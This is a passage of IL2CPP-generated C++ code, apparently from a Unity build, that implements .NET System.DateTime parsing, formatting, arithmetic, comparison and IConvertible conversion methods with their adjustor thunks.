RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_Parse_mFB11F5C0061CEAD9A2F51E3814DEBE0475F2BA37_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___s0; RuntimeObject* L_1 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = DateTimeFormatInfo_GetInstance_m83D1F4FFA0E6FD7F223040DAE0EAD02993FBE2DD(L_1, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_3 = DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A(L_0, L_2, 0, /*hidden argument*/NULL); return L_3; } } // System.DateTime System.DateTime::ParseExact(System.String,System.String,System.IFormatProvider,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_ParseExact_mF45E615EBCC82CA967D4BC7838EE570508D0F97F (String_t* ___s0, String_t* ___format1, RuntimeObject* ___provider2, int32_t ___style3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_ParseExact_mF45E615EBCC82CA967D4BC7838EE570508D0F97F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___style3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_ValidateStyles_m681E339557B4727B92138AAEC70ACC69FF31CA17(L_0, _stringLiteral26EC8D00FB6B55466B3A115F1D559422A7FA7AAC, /*hidden argument*/NULL); String_t* L_1 = ___s0; String_t* L_2 = ___format1; RuntimeObject* L_3 = ___provider2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = DateTimeFormatInfo_GetInstance_m83D1F4FFA0E6FD7F223040DAE0EAD02993FBE2DD(L_3, /*hidden argument*/NULL); int32_t L_5 = ___style3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_6 = DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD(L_1, L_2, L_4, L_5, /*hidden argument*/NULL); return L_6; } } // System.String System.DateTime::ToString() extern "C" IL2CPP_METHOD_ATTR String_t* DateTime_ToString_mBB245CB189C10659D35E8E273FB03E34EA1A7122 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_ToString_mBB245CB189C10659D35E8E273FB03E34EA1A7122_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_0 = DateTimeFormatInfo_get_CurrentInfo_m74E97DE51E5F8F803557FCDF11F041F200AB9C3F(/*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_1 = DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this), (String_t*)NULL, L_0, /*hidden argument*/NULL); return L_1; } } extern "C" String_t* DateTime_ToString_mBB245CB189C10659D35E8E273FB03E34EA1A7122_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_ToString_mBB245CB189C10659D35E8E273FB03E34EA1A7122(_thisAdjusted, method); } // System.String System.DateTime::ToString(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* DateTime_ToString_m30D2730D4AB64F21D73E2037237150FC5B00F0C8 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_ToString_m30D2730D4AB64F21D73E2037237150FC5B00F0C8_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject* L_0 = ___provider0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_1 = DateTimeFormatInfo_GetInstance_m83D1F4FFA0E6FD7F223040DAE0EAD02993FBE2DD(L_0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_2 = DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this), (String_t*)NULL, L_1, /*hidden argument*/NULL); return L_2; } } extern "C" String_t* DateTime_ToString_m30D2730D4AB64F21D73E2037237150FC5B00F0C8_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_ToString_m30D2730D4AB64F21D73E2037237150FC5B00F0C8(_thisAdjusted, ___provider0, method); } // System.String System.DateTime::ToString(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* DateTime_ToString_m9943D2AB36F33BA0A4CF44DAE32D5944E2561B1C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, String_t* ___format0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_ToString_m9943D2AB36F33BA0A4CF44DAE32D5944E2561B1C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___format0; RuntimeObject* L_1 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = DateTimeFormatInfo_GetInstance_m83D1F4FFA0E6FD7F223040DAE0EAD02993FBE2DD(L_1, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_3 = DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this), L_0, L_2, /*hidden argument*/NULL); return L_3; } } extern "C" String_t* DateTime_ToString_m9943D2AB36F33BA0A4CF44DAE32D5944E2561B1C_AdjustorThunk (RuntimeObject * __this, String_t* ___format0, RuntimeObject* ___provider1, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_ToString_m9943D2AB36F33BA0A4CF44DAE32D5944E2561B1C(_thisAdjusted, ___format0, ___provider1, method); } // System.DateTime System.DateTime::ToUniversalTime() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_ToUniversalTime_mA8B74D947E186568C55D9C6F56D59F9A3C7775B1 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_0 = TimeZoneInfo_ConvertTimeToUtc_m296EB8284D179E8F42849A9F02306B55CA009952((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this), 2, /*hidden argument*/NULL); return L_0; } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_ToUniversalTime_mA8B74D947E186568C55D9C6F56D59F9A3C7775B1_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_ToUniversalTime_mA8B74D947E186568C55D9C6F56D59F9A3C7775B1(_thisAdjusted, method); } // System.DateTime System.DateTime::op_Addition(System.DateTime,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_op_Addition_m6CE7A79B6E219E67A75AB17545D1873529262282 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_op_Addition_m6CE7A79B6E219E67A75AB17545D1873529262282_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; int64_t V_1 = 0; { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d0), /*hidden argument*/NULL); V_0 = L_0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_1 = ___t1; int64_t L_2 = L_1.get__ticks_3(); V_1 = L_2; int64_t L_3 = V_1; int64_t L_4 = V_0; if ((((int64_t)L_3) > ((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)((int64_t)3155378975999999999LL), (int64_t)L_4))))) { goto IL_0024; } } { int64_t L_5 = V_1; int64_t L_6 = V_0; if ((((int64_t)L_5) >= ((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)(((int64_t)((int64_t)0))), (int64_t)L_6))))) { goto IL_0039; } } IL_0024: { String_t* L_7 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6CD6471277F304FD7D1ADCD50886324343DBE87F, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_8 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_8, _stringLiteral8EFD86FB78A56A5145ED7739DCB00C78581C5375, L_7, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_8, NULL, DateTime_op_Addition_m6CE7A79B6E219E67A75AB17545D1873529262282_RuntimeMethod_var); } IL_0039: { int64_t L_9 = V_0; int64_t L_10 = V_1; uint64_t L_11 = DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d0), /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_12; memset(&L_12, 0, sizeof(L_12)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_12), ((int64_t)((int64_t)((int64_t)il2cpp_codegen_add((int64_t)L_9, (int64_t)L_10))|(int64_t)L_11)), /*hidden argument*/NULL); return L_12; } } // System.DateTime System.DateTime::op_Subtraction(System.DateTime,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___t1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; int64_t V_1 = 0; { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d0), /*hidden argument*/NULL); V_0 = L_0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_1 = ___t1; int64_t L_2 = L_1.get__ticks_3(); V_1 = L_2; int64_t L_3 = V_0; int64_t L_4 = V_1; if ((((int64_t)L_3) < ((int64_t)L_4))) { goto IL_0021; } } { int64_t L_5 = V_0; int64_t L_6 = V_1; if ((((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)L_5, (int64_t)((int64_t)3155378975999999999LL)))) <= ((int64_t)L_6))) { goto IL_0036; } } IL_0021: { String_t* L_7 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6CD6471277F304FD7D1ADCD50886324343DBE87F, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_8 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_8, _stringLiteral8EFD86FB78A56A5145ED7739DCB00C78581C5375, L_7, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_8, NULL, DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B_RuntimeMethod_var); } IL_0036: { int64_t L_9 = V_0; int64_t L_10 = V_1; uint64_t L_11 = DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d0), /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_12; memset(&L_12, 0, sizeof(L_12)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_12), ((int64_t)((int64_t)((int64_t)il2cpp_codegen_subtract((int64_t)L_9, (int64_t)L_10))|(int64_t)L_11)), /*hidden argument*/NULL); return L_12; } } // System.TimeSpan System.DateTime::op_Subtraction(System.DateTime,System.DateTime) extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 DateTime_op_Subtraction_m8005DCC8F0F183AC1335F87A82FDF92926CC5021 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d10, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d21, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d10), /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d21), /*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_2; memset(&L_2, 0, sizeof(L_2)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((&L_2), ((int64_t)il2cpp_codegen_subtract((int64_t)L_0, (int64_t)L_1)), /*hidden argument*/NULL); return L_2; } } // System.Boolean System.DateTime::op_Equality(System.DateTime,System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_op_Equality_m5715465D90806F5305BBA5F690377819C55AF084 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d10, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___d21, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d10), /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___d21), /*hidden argument*/NULL); return (bool)((((int64_t)L_0) == ((int64_t)L_1))? 1 : 0); } } // System.Boolean System.DateTime::op_LessThan(System.DateTime,System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_op_LessThan_m75DE4F8CC5F5EE392829A9B37C5C98B7FC97061A (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t10, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t21, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t10), /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t21), /*hidden argument*/NULL); return (bool)((((int64_t)L_0) < ((int64_t)L_1))? 1 : 0); } } // System.Boolean System.DateTime::op_LessThanOrEqual(System.DateTime,System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_op_LessThanOrEqual_m7131235B927010BD9DB3C93FEB51640286D1107B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t10, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t21, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t10), /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t21), /*hidden argument*/NULL); return (bool)((((int32_t)((((int64_t)L_0) > ((int64_t)L_1))? 1 : 0)) == ((int32_t)0))? 1 : 0); } } // System.Boolean System.DateTime::op_GreaterThan(System.DateTime,System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_op_GreaterThan_mC9384F126E5D8A3AAAB0BDFC44D1D7319367C89E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t10, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t21, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t10), /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t21), /*hidden argument*/NULL); return (bool)((((int64_t)L_0) > ((int64_t)L_1))? 1 : 0); } } // System.Boolean System.DateTime::op_GreaterThanOrEqual(System.DateTime,System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_op_GreaterThanOrEqual_mEDD57FC8B24FAF4D6AA94CFE6AE190CF359B66B4 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t10, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___t21, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t10), /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___t21), /*hidden argument*/NULL); return (bool)((((int32_t)((((int64_t)L_0) < ((int64_t)L_1))? 1 : 0)) == ((int32_t)0))? 1 : 0); } } // System.TypeCode System.DateTime::GetTypeCode() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_GetTypeCode_m81C81123AC262794A28C3AA7F717D84A620290DB (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method) { { return (int32_t)(((int32_t)16)); } } extern "C" int32_t DateTime_GetTypeCode_m81C81123AC262794A28C3AA7F717D84A620290DB_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_GetTypeCode_m81C81123AC262794A28C3AA7F717D84A620290DB(_thisAdjusted, method); } // System.Boolean System.DateTime::System.IConvertible.ToBoolean(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR bool DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteralB76FF4906F33C2DD97DDD929B9662BA8CAC6174C); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteralB76FF4906F33C2DD97DDD929B9662BA8CAC6174C); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43_RuntimeMethod_var); } } extern "C" bool DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43(_thisAdjusted, ___provider0, method); } // System.Char System.DateTime::System.IConvertible.ToChar(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Il2CppChar DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral0F9BA953E35135A3F8EC268817CC92F2557202A9); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral0F9BA953E35135A3F8EC268817CC92F2557202A9); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859_RuntimeMethod_var); } } extern "C" Il2CppChar DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859(_thisAdjusted, ___provider0, method); } // System.SByte System.DateTime::System.IConvertible.ToSByte(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int8_t DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral9B30C1BF65712BDA061818365704D06F3871C202); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject 